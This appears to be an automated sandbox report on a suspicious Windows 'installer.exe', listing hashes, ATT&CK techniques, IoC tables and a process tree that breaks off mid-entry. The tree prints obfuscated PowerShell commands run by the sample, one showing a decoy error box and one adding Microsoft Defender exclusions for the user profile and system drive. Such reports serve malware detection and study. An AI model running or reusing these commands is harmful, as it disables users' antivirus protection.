47967c1fb402a8536ccde5893855b5cf9283c352165fcfd31ef943e0babafa92

Analysis

max time kernel
615s
max time network
616s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25/09/2024, 09:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

installer.exe
Size

7.0MB
MD5

be8f30f145ddb50fa3c05441af904cc5
SHA1

618ea25eff7dee7c24e1756e327180818c11b7a1
SHA256

47967c1fb402a8536ccde5893855b5cf9283c352165fcfd31ef943e0babafa92
SHA512

ec257216349f4d3a0581f5f8c46b09b0821b3ab9ac17310baa17a30d8eb82301828bf257f6652a271d577e0c1fb0bfea07aeab36be603cfa5e8326db946368cb
SSDEEP

196608:yNLPaPVczkhJixJ3ra9ai+QK3lo9rtiO6SzyVumyN:YyxhJkNra9l+QgyOAyVC

Score

6^/10

defense_evasion discovery

Malware Config

Signatures

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
12904	12672	WerFault.exe	1038

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1904	powershell.exe
2232	powershell.exe
2344	powershell.exe
2476	powershell.exe
2224	powershell.exe
2788	powershell.exe
2332	powershell.exe
2364	powershell.exe
308	powershell.exe
1508	powershell.exe
2484	powershell.exe
2316	powershell.exe
1108	powershell.exe
1484	powershell.exe
2520	powershell.exe
2500	powershell.exe
1496	powershell.exe
1580	powershell.exe
2844	powershell.exe
2856	powershell.exe
2968	powershell.exe
1752	powershell.exe
3020	powershell.exe
3032	powershell.exe
1612	powershell.exe
1828	powershell.exe
1708	powershell.exe
776	powershell.exe
2512	powershell.exe
3096	powershell.exe
3136	powershell.exe
3268	powershell.exe
3332	powershell.exe
3440	powershell.exe
3412	powershell.exe
3632	powershell.exe
3660	powershell.exe
3780	powershell.exe
3944	powershell.exe
3756	powershell.exe
3972	powershell.exe
2452	powershell.exe
2412	powershell.exe
3672	powershell.exe
3684	powershell.exe
3836	powershell.exe
1472	powershell.exe
3512	powershell.exe
1112	powershell.exe
1276	powershell.exe
3772	powershell.exe
3820	powershell.exe
1832	powershell.exe
3848	powershell.exe
3792	powershell.exe
4140	powershell.exe
4112	powershell.exe
4264	powershell.exe
4284	powershell.exe
4440	powershell.exe
4492	powershell.exe
4656	powershell.exe
4624	powershell.exe
4796	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	1904	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeDebugPrivilege	308	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	1828	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	2512	powershell.exe
Token: SeDebugPrivilege	3096	powershell.exe
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeDebugPrivilege	3268	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	3412	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	3944	powershell.exe
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	3672	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeDebugPrivilege	3820	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeDebugPrivilege	3792	powershell.exe
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	4624	powershell.exe
Token: SeDebugPrivilege	4796	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 1904	2372	installer.exe	30
PID 2372 wrote to memory of 1904	2372	installer.exe	30
PID 2372 wrote to memory of 1904	2372	installer.exe	30
PID 2372 wrote to memory of 1904	2372	installer.exe	30
PID 2372 wrote to memory of 2476	2372	installer.exe	32
PID 2372 wrote to memory of 2476	2372	installer.exe	32
PID 2372 wrote to memory of 2476	2372	installer.exe	32
PID 2372 wrote to memory of 2476	2372	installer.exe	32
PID 2372 wrote to memory of 2396	2372	installer.exe	34
PID 2372 wrote to memory of 2396	2372	installer.exe	34
PID 2372 wrote to memory of 2396	2372	installer.exe	34
PID 2372 wrote to memory of 2396	2372	installer.exe	34
PID 2372 wrote to memory of 2396	2372	installer.exe	34
PID 2372 wrote to memory of 2396	2372	installer.exe	34
PID 2372 wrote to memory of 2396	2372	installer.exe	34
PID 2396 wrote to memory of 2344	2396	installer.exe	35
PID 2396 wrote to memory of 2344	2396	installer.exe	35
PID 2396 wrote to memory of 2344	2396	installer.exe	35
PID 2396 wrote to memory of 2344	2396	installer.exe	35
PID 2396 wrote to memory of 2232	2396	installer.exe	37
PID 2396 wrote to memory of 2232	2396	installer.exe	37
PID 2396 wrote to memory of 2232	2396	installer.exe	37
PID 2396 wrote to memory of 2232	2396	installer.exe	37
PID 2396 wrote to memory of 2892	2396	installer.exe	39
PID 2396 wrote to memory of 2892	2396	installer.exe	39
PID 2396 wrote to memory of 2892	2396	installer.exe	39
PID 2396 wrote to memory of 2892	2396	installer.exe	39
PID 2396 wrote to memory of 2892	2396	installer.exe	39
PID 2396 wrote to memory of 2892	2396	installer.exe	39
PID 2396 wrote to memory of 2892	2396	installer.exe	39
PID 2892 wrote to memory of 2224	2892	installer.exe	40
PID 2892 wrote to memory of 2224	2892	installer.exe	40
PID 2892 wrote to memory of 2224	2892	installer.exe	40
PID 2892 wrote to memory of 2224	2892	installer.exe	40
PID 2892 wrote to memory of 2788	2892	installer.exe	42
PID 2892 wrote to memory of 2788	2892	installer.exe	42
PID 2892 wrote to memory of 2788	2892	installer.exe	42
PID 2892 wrote to memory of 2788	2892	installer.exe	42
PID 2892 wrote to memory of 2600	2892	installer.exe	44
PID 2892 wrote to memory of 2600	2892	installer.exe	44
PID 2892 wrote to memory of 2600	2892	installer.exe	44
PID 2892 wrote to memory of 2600	2892	installer.exe	44
PID 2892 wrote to memory of 2600	2892	installer.exe	44
PID 2892 wrote to memory of 2600	2892	installer.exe	44
PID 2892 wrote to memory of 2600	2892	installer.exe	44
PID 2600 wrote to memory of 2332	2600	installer.exe	45
PID 2600 wrote to memory of 2332	2600	installer.exe	45
PID 2600 wrote to memory of 2332	2600	installer.exe	45
PID 2600 wrote to memory of 2332	2600	installer.exe	45
PID 2600 wrote to memory of 2364	2600	installer.exe	47
PID 2600 wrote to memory of 2364	2600	installer.exe	47
PID 2600 wrote to memory of 2364	2600	installer.exe	47
PID 2600 wrote to memory of 2364	2600	installer.exe	47
PID 2600 wrote to memory of 2824	2600	installer.exe	49
PID 2600 wrote to memory of 2824	2600	installer.exe	49
PID 2600 wrote to memory of 2824	2600	installer.exe	49
PID 2600 wrote to memory of 2824	2600	installer.exe	49
PID 2600 wrote to memory of 2824	2600	installer.exe	49
PID 2600 wrote to memory of 2824	2600	installer.exe	49
PID 2600 wrote to memory of 2824	2600	installer.exe	49
PID 2824 wrote to memory of 308	2824	installer.exe	50
PID 2824 wrote to memory of 308	2824	installer.exe	50
PID 2824 wrote to memory of 308	2824	installer.exe	50
PID 2824 wrote to memory of 308	2824	installer.exe	50

C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1904
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2476
- C:\Users\Admin\AppData\Local\Temp\installer.exe
  "C:\Users\Admin\AppData\Local\Temp\installer.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2396
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2344
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2232
- - C:\Users\Admin\AppData\Local\Temp\installer.exe
    "C:\Users\Admin\AppData\Local\Temp\installer.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2892
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2224
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2788
  - - C:\Users\Admin\AppData\Local\Temp\installer.exe
      "C:\Users\Admin\AppData\Local\Temp\installer.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2600
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2364
    - - C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2824
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:308
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1508
      - C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        6⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        7⤵
        
        PID:836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
